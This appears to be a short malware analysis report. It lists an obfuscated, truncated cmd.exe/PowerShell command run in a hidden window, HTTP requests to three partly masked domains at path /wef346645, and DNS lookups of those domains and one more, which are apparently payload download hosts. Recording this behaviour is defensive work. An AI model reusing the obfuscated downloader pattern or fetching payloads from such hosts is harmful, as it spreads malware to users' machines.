Technical Information
- '<SYSTEM32>\cmd.exe' gGJHgj gJH gu gKHNL nl Nl & %C^om^S^p^Ec% /V /c set %SJdLpakpKsiVadV%=iXnfwPBmbJzdwq&&set %zkfGEkodTjRMD%=o^we^r^s&&set %RRVFvTJptqTBDaO%=cctXCqbrHC&&set %iBvqMEmzNGMUU...
- 'sm###-soft.pl':80
- 'ch####hinenow.com':80
- 'er###joy.com':80
- http://sm###-soft.pl/wef346645
- http://ch####hinenow.com/wef346645
- http://er###joy.com/wef346645
- DNS ASK sm###-soft.pl
- DNS ASK ch####hinenow.com
- DNS ASK tr#####stvi-bezdeka.cz
- DNS ASK er###joy.com
- '<SYSTEM32>\cmd.exe' gGJHgj gJH gu gKHNL nl Nl & %C^om^S^p^Ec% /V /c set %SJdLpakpKsiVadV%=iXnfwPBmbJzdwq&&set %zkfGEkodTjRMD%=o^we^r^s&&set %RRVFvTJptqTBDaO%=cctXCqbrHC&&set %iBvqMEmzNGMUU...' (with hidden window)